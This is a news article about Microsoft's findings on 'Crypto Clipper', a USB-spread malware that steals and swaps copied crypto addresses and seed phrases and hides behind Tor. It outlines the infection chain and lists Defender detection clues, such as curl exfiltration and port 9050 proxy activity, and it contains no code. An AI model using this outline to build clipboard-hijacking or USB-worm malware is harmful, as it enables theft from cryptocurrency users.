Microsoft says it has spotted a new self-spreading threat called Crypto Clipper, and this one goes after crypto users in a rather ugly way: it moves through USB drives, watches the clipboard for wallet data, and can swap out recipient addresses before a transfer goes through. The twist is that it avoids the usual command-and-control setup, leaning instead on a local Tor client and SOCKS5 proxy traffic to hide where orders and stolen data are coming from.
That combination makes the malware more annoying than a basic clipper and more flexible than a simple USB worm. In other words, it is built to spread, steal, and stay hard to trace – a tidy little trifecta for attackers and a headache for everyone else.
How the USB infection starts
The infection chain begins with .lnk shortcut files on USB drives. Once an infected device is plugged in, the malicious code checks whether its own component is already present; if not, it pulls it in through the hidden Tor-based channel. Microsoft says the setup is designed to reduce visibility and make source tracking much harder than in a conventional malware campaign.
This is the part that should make security teams pay attention beyond the crypto angle. USB-borne malware is old-school, but pairing it with anonymity tooling is a smarter, nastier update that borrows from both worm-style spread and modern stealth tactics.
Clipboard theft and address swapping
Once inside a system, Crypto Clipper monitors the clipboard for strings that resemble crypto addresses or seed phrases made up of 12 or 24 words. If it finds them, it grabs the data and sends it away. It also takes five screenshots in 10 seconds, apparently to capture whatever the victim is doing at the time.
- Targets crypto addresses and seed phrases
- Can replace copied addresses with attacker-controlled wallets
- Takes five screenshots in 10 seconds
That address-swapping trick is the real sting in the tail. It does not need to drain a wallet directly if it can quietly redirect the payment at the moment of copy and paste – a classic clipper move, just dressed up with better evasion.
Microsoft Defender detection clues
Microsoft Defender identifies the components as suspicious JavaScript processes and potential data exfiltration through curl, while the antivirus labels the threat as Trojan:Win32/CryptoBandits.A. Microsoft also points to indirect signs of infection, including child processes launched by script interpreters, local proxy activity on port 9050, screen-capture attempts via PowerShell, and clipboard analysis or address-replacement behavior.
That detection profile suggests defenders may have to look for behavior, not just filenames. The malware can hide behind routine scripting tools and normal-looking USB file names, which is exactly how these things keep slipping through the cracks.
Crypto Clipper threat profile
Crypto theft malware is hardly new, but this one folds several techniques into a single package: clipboard hijacking, screen capture, remote command execution, and anonymous transport. That mix makes it closer to spyware with a payment redirect button than a one-trick clipper. For crypto holders, the lesson is boring but brutal: if a wallet address was copied from a compromised machine, it should not be trusted on faith.
Expect defenders to keep seeing more of this hybrid style of malware. The low cost of USB spread, plus anonymity layers that blur attribution, is a neat fit for criminals who want reach without running noisy infrastructure. That is not a great combination for anyone storing seed phrases near a Windows box.